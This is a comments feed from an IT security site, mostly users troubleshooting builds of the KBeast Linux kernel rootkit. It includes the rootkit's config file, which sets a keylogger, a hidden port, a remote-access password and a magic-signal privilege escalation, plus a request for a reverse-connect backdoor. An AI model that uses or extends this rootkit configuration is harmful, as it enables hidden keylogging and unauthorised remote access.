Comments for IT Security

Comment on [UPDATE] KBeast – The New Kernel Rootkit by aerosmith

aerosmith — Thu, 28 Feb 2013 23:23:57 +0000

help me,
my problem same “How can i fix this? I try installing kernel-headers, but not work.”

how fix?
thanks

Comment on Network & Computer Forensics by rifan

rifan — Fri, 04 Jan 2013 10:31:30 +0000

Salam admin ipsec.
Saya sedang mengerjakan skripsi tentang forensik jaringan dan slideshow dari don anto sangat membantu sekali tetapi saya masih sangat awam sekali.
Disini saya mohon untuk penjelasan lebih detail tentang isi dari slideshow pada bahasan tentang mekanisme mencari bukti digital di beberapa media untuk mengumpulkan bukti digital tersebut.
Terima kasih atas bantuannya.
Good luck always.

Comment on [UPDATE] KBeast – The New Kernel Rootkit by tirher

tirher — Wed, 19 Dec 2012 18:43:56 +0000

I have this kernel:

# uname -a
Linux redes-seguridad.com.ar 2.6.32-220.el6.i686 #1 SMP Tue Dec 6 16:15:40 GMT 2011 i686 i686 i386 GNU/Linux

In centos:

# cat /etc/issue
CentOS release 6.3 (Final)
Kernel \r on an \m

And when i run this, obtein an error:

# ./setup build
Checking for Kernel Header : [NOT OK] – Please Install!

How can i fix this? I try installing kernel-headers, but not work.

Tnks

Comment on OpenSSH Backdoor With PAM Support by Safee

Safee — Mon, 10 Dec 2012 02:51:45 +0000

Greetings! The site is great. Thank you for a great resource

Comment on [UPDATE] KBeast – The New Kernel Rootkit by pxf

pxf — Fri, 16 Nov 2012 03:07:05 +0000

Hi. I tested this on centos6.3(64bit) running 2.6.32 and it didn’t work,on centos6.2 (32bit) is ok.

Last login: Fri Mar 2 19:32:48 2012
/bin/basename: missing operand
Try `/bin/basename –help’ for more information.

why?

Comment on [UPDATE] KBeast – The New Kernel Rootkit by rex

rex — Thu, 15 Nov 2012 14:09:17 +0000

[root@test1 _h4x_]# make
make -C /lib/modules/2.6.32-279.el6.x86_64/build M=/usr/_h4x_ modules
make[1]: Entering directory `/usr/src/kernels/2.6.32-279.el6.x86_64′
CC [M] /usr/_h4x_/ipsecs-kbeast-v1.o
/usr/_h4x_/ipsecs-kbeast-v1.c: In function ‘h4x_read’:
/usr/_h4x_/ipsecs-kbeast-v1.c:239: warning: ignoring return value of ‘copy_from_user’, declared with attribute warn_unused_result
/usr/_h4x_/ipsecs-kbeast-v1.c: In function ‘h4x_write’:
/usr/_h4x_/ipsecs-kbeast-v1.c:476: warning: ignoring return value of ‘copy_from_user’, declared with attribute warn_unused_result
/usr/_h4x_/ipsecs-kbeast-v1.c: In function ‘h4x_getdents’:
/usr/_h4x_/ipsecs-kbeast-v1.c:507: error: dereferencing pointer to incomplete type
/usr/_h4x_/ipsecs-kbeast-v1.c:509: error: dereferencing pointer to incomplete type
/usr/_h4x_/ipsecs-kbeast-v1.c:511: error: dereferencing pointer to incomplete type
/usr/_h4x_/ipsecs-kbeast-v1.c:513: error: dereferencing pointer to incomplete type
/usr/_h4x_/ipsecs-kbeast-v1.c:516: error: dereferencing pointer to incomplete type
/usr/_h4x_/ipsecs-kbeast-v1.c:521: error: dereferencing pointer to incomplete type
/usr/_h4x_/ipsecs-kbeast-v1.c:503: warning: ignoring return value of ‘copy_from_user’, declared with attribute warn_unused_result
/usr/_h4x_/ipsecs-kbeast-v1.c:523: warning: ignoring return value of ‘copy_to_user’, declared with attribute warn_unused_result
/usr/_h4x_/ipsecs-kbeast-v1.c: In function ‘h4x_unlink’:
/usr/_h4x_/ipsecs-kbeast-v1.c:569: warning: ignoring return value of ‘copy_from_user’, declared with attribute warn_unused_result
/usr/_h4x_/ipsecs-kbeast-v1.c: In function ‘h4x_rmdir’:
/usr/_h4x_/ipsecs-kbeast-v1.c:584: warning: ignoring return value of ‘copy_from_user’, declared with attribute warn_unused_result
/usr/_h4x_/ipsecs-kbeast-v1.c: In function ‘h4x_unlinkat’:
/usr/_h4x_/ipsecs-kbeast-v1.c:598: warning: ignoring return value of ‘copy_from_user’, declared with attribute warn_unused_result
/usr/_h4x_/ipsecs-kbeast-v1.c: In function ‘h4x_rename’:
/usr/_h4x_/ipsecs-kbeast-v1.c:613: warning: ignoring return value of ‘copy_from_user’, declared with attribute warn_unused_result
/usr/_h4x_/ipsecs-kbeast-v1.c:614: warning: ignoring return value of ‘copy_from_user’, declared with attribute warn_unused_result
/usr/_h4x_/ipsecs-kbeast-v1.c: In function ‘h4x_open’:
/usr/_h4x_/ipsecs-kbeast-v1.c:630: warning: ignoring return value of ‘copy_from_user’, declared with attribute warn_unused_result
/usr/_h4x_/ipsecs-kbeast-v1.c: In function ‘h4x_delete_module’:
/usr/_h4x_/ipsecs-kbeast-v1.c:664: warning: ignoring return value of ‘copy_from_user’, declared with attribute warn_unused_result
/usr/_h4x_/ipsecs-kbeast-v1.c: In function ‘init’:
/usr/_h4x_/ipsecs-kbeast-v1.c:679: warning: ISO C90 forbids mixed declarations and code
/usr/_h4x_/ipsecs-kbeast-v1.c:686: warning: assignment makes integer from pointer without a cast
/usr/_h4x_/ipsecs-kbeast-v1.c:689: warning: assignment makes integer from pointer without a cast
/usr/_h4x_/ipsecs-kbeast-v1.c:691: warning: assignment makes pointer from integer without a cast
/usr/_h4x_/ipsecs-kbeast-v1.c:692: warning: assignment makes integer from pointer without a cast
/usr/_h4x_/ipsecs-kbeast-v1.c:699: warning: assignment makes pointer from integer without a cast
/usr/_h4x_/ipsecs-kbeast-v1.c:700: warning: assignment makes integer from pointer without a cast
/usr/_h4x_/ipsecs-kbeast-v1.c:701: warning: assignment makes pointer from integer without a cast
/usr/_h4x_/ipsecs-kbeast-v1.c:702: warning: assignment makes integer from pointer without a cast
/usr/_h4x_/ipsecs-kbeast-v1.c:703: warning: assignment makes pointer from integer without a cast
/usr/_h4x_/ipsecs-kbeast-v1.c:704: warning: assignment makes integer from pointer without a cast
/usr/_h4x_/ipsecs-kbeast-v1.c:705: warning: assignment makes pointer from integer without a cast
/usr/_h4x_/ipsecs-kbeast-v1.c:706: warning: assignment makes integer from pointer without a cast
/usr/_h4x_/ipsecs-kbeast-v1.c:707: warning: assignment makes pointer from integer without a cast
/usr/_h4x_/ipsecs-kbeast-v1.c:708: warning: assignment makes integer from pointer without a cast
/usr/_h4x_/ipsecs-kbeast-v1.c:709: warning: assignment makes pointer from integer without a cast
/usr/_h4x_/ipsecs-kbeast-v1.c:710: warning: assignment makes integer from pointer without a cast
/usr/_h4x_/ipsecs-kbeast-v1.c:711: warning: assignment makes pointer from integer without a cast
/usr/_h4x_/ipsecs-kbeast-v1.c:712: warning: assignment makes integer from pointer without a cast
/usr/_h4x_/ipsecs-kbeast-v1.c: At top level:
/usr/_h4x_/ipsecs-kbeast-v1.c:727: warning: conflicting types for built-in function ‘exit’
/usr/_h4x_/ipsecs-kbeast-v1.c: In function ‘exit’:
/usr/_h4x_/ipsecs-kbeast-v1.c:735: warning: assignment makes integer from pointer without a cast
/usr/_h4x_/ipsecs-kbeast-v1.c:737: warning: assignment makes integer from pointer without a cast
/usr/_h4x_/ipsecs-kbeast-v1.c:739: warning: assignment makes integer from pointer without a cast
/usr/_h4x_/ipsecs-kbeast-v1.c:745: warning: assignment makes integer from pointer without a cast
/usr/_h4x_/ipsecs-kbeast-v1.c:746: warning: assignment makes integer from pointer without a cast
/usr/_h4x_/ipsecs-kbeast-v1.c:747: warning: assignment makes integer from pointer without a cast
/usr/_h4x_/ipsecs-kbeast-v1.c:748: warning: assignment makes integer from pointer without a cast
/usr/_h4x_/ipsecs-kbeast-v1.c:749: warning: assignment makes integer from pointer without a cast
/usr/_h4x_/ipsecs-kbeast-v1.c:750: warning: assignment makes integer from pointer without a cast
/usr/_h4x_/ipsecs-kbeast-v1.c:751: warning: assignment makes integer from pointer without a cast
make[2]: *** [/usr/_h4x_/ipsecs-kbeast-v1.o] Error 1
make[1]: *** [_module_/usr/_h4x_] Error 2
make[1]: Leaving directory `/usr/src/kernels/2.6.32-279.el6.x86_64′
make: *** [all] Error 2

Comment on [UPDATE] KBeast – The New Kernel Rootkit by rex

rex — Thu, 15 Nov 2012 14:07:38 +0000

Hi. I tested this on centos6.3(64bit) running 2.6.32-279 and it didn’t work,help me.
[root@test1 kbeast-v1]# uname -a
Linux test1 2.6.32-279.el6.x86_64 #1 SMP Fri Jun 22 12:19:21 UTC 2012 x86_64 x86_64 x86_64 GNU/Linux
[root@test1 kbeast-v1]# ./setup build 1

::::::::::: ::::::::: :::::::: :::::::::: :::::::: ::::::::
:+: :+: :+: :+: :+: :+: :+: :+: :+: :+:
+:+ +:+ +:+ +:+ +:+ +:+ +:+
+#+ +#++:++#+ +#++:++#++ +#++:++# +#+ +#++:++#++
+#+ +#+ +#+ +#+ +#+ +#+
#+# #+# #+# #+# #+# #+# #+# #+# #+#
########### ### ######## ########## ######## ########

Checking for Kernel Beast : [OK]
Checking for sed : /bin/sed
Generating C file from .cc1 : [OK]
Checking for Makefile : [OK]
Checking for Network Daemon : [OK]
Checking for Config File : [OK]
Checking for Kernel Header : [OK]
Checking for gcc : /usr/bin/gcc
Checking for make : /usr/bin/make
Checking for kernel version : [OK]
Creating Install Directory : [OK]
Compiling Kernel Module : [NOT OK]

[root@test1 kbeast-v1]# cat config.h
/*
Kernel Beast Ver #1.0 – Configuration File
Copyright Ph03n1X of IPSECS (c) 2011
Get more research of ours http://ipsecs.com
*/

/*Don’t change this line*/
#define TRUE 1
#define FALSE 0

/*
Enable keylog probably makes the system unstable
But worth to be tried
*/
#define _KEYLOG_ TRUE

/*Define your module & network daemon name*/
#define KBEAST “kbeast”

/*
All files, dirs, process will be hidden
Protected from deletion & being killed
*/
#define _H4X0R_ “_h4x_”

/*
Directory where your rootkit will be saved
You have to use _H4X0R_ in your directory name
No slash (/) at the end
*/
#define _H4X_PATH_ “/usr/_h4x_”

/*
File to save key logged data
*/
#define _LOGFILE_ “acctlog”

/*
This port will be hidded from netstat
*/
#define _HIDE_PORT_ 13377

/*
Password for remote access
*/
#define _RPASSWORD_ “h4x3d”
#define _MAGIC_NAME_ “xxx”
/*
Magic signal & pid for local escalation
*/
#define _MAGIC_SIG_ 37 //kill signal
#define _MAGIC_PID_ 31337 //kill this pid

Comment on [UPDATE] KBeast – The New Kernel Rootkit by Syd

Syd — Wed, 14 Nov 2012 01:53:25 +0000

I installed KBeast (Linux rootkit 2012) and the package works just as described except for the fact that I can’t seem to see anything in my key logging file (i.e. the file is empty). In particular, below is how I define this file.

/*
File to save key logged data
*/
#define _LOGFILE_ “rootkit.log”

However, when I go to the location of this file “/usr/_h4x_rootKit” I see a file named “rootkit.log.9″. When I attempt to read this file (using vim) I get the message that the file is already opened, and if I open it in “read only” mode (or using cat), its empty. How do I view the data?

Comment on [UPDATE] KBeast – The New Kernel Rootkit by rex

rex — Tue, 13 Nov 2012 23:14:22 +0000

if you can replace the bind port backdoor with the reverse-connect backdoor,it would be perfect.

Comment on [UPDATE] KBeast – The New Kernel Rootkit by rex

rex — Tue, 13 Nov 2012 14:50:07 +0000

if you can replace the bind port backdoor with the connect-back backdoor,it would be perfect.